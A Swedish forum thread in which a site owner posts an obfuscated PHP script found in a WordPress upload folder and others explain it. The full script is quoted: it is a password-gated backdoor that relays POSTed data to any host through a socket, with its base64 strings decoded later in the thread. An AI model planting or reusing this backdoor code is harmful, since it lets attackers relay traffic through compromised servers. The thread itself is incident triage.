[mephisto73]

Jag hittade följande script på en av mina wordpressinstallationer (i upload mappen). Någon som vet vad den gör?

Kod:

<? function _1679490774($i){$a=Array('NWY0YjY3YjM1MWU0NjVmYjRjMmYyMzRlMjA4ZmYwYjg=','cXVlcnk=','aG9zdA==','c2VjcmV0','Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0=','IA==','Kw==','cXVlcnk=','Og==','IA==','Kw==','aG9zdA==');return base64_decode($a[$i]);} ?><?php $_0=_1679490774(0);if(isset($_POST[_1679490774(1)])&& isset($_POST[_1679490774(2)])){if(isset($_1)&&(md5(md5($_POST[_1679490774(3)]))!= $_0))exit;header(_1679490774(4));@set_time_limit(0);$_2=base64_decode(str_replace(_1679490774(5),_1679490774(6),$_POST[_1679490774(7)]));list($_3,$_4)=explode(_1679490774(8),base64_decode(str_replace(_1679490774(9),_1679490774(10),$_POST[_1679490774(11)])));if(!$_4)$_4=80;$_5=gethostbyname($_3);if($_6=@fsockopen($_5,$_4,$_7,$_8,20)){fwrite($_6,$_2);while(!feof($_6)){$_9=fread($_6,1024);echo $_9;}fclose($_6);}exit;} ?>

[Danielos]

Hade du kört mod security hade det där skriptet aldrig kunnat laddas upp.

[Jonas]

hade du kört senaste versionen av WP så hade det nog inte hamnat där.

[emilv]

Som svar på frågan: Det gör garanterat något busigt. Du bör kolla så att inga filer på ditt konto blivit ändrade nyligen, ta bort det där skriptet och se till att du kör den senaste versionen av både Wordpress och alla eventuella plugins.

[Jonas]

Base64 arrayen innehåller följande:

Kod:

5f4b67b351e465fb4c2f234e208ff0b8
query
host
secret
Content-type: application/octet-stream
 
+
query
:
 
+
host

Scriptet tar emot argument via POST, som öppnar en socket mot en host.

Scriptet i sig gör ingen skada på dina filer, utan är mest ett "proxy" script.

[mephisto73]

Ok. Jag har redan uppgraderat och rensat, det var en gammal oanvänd installation, men i alla fall...

Tack för svaret.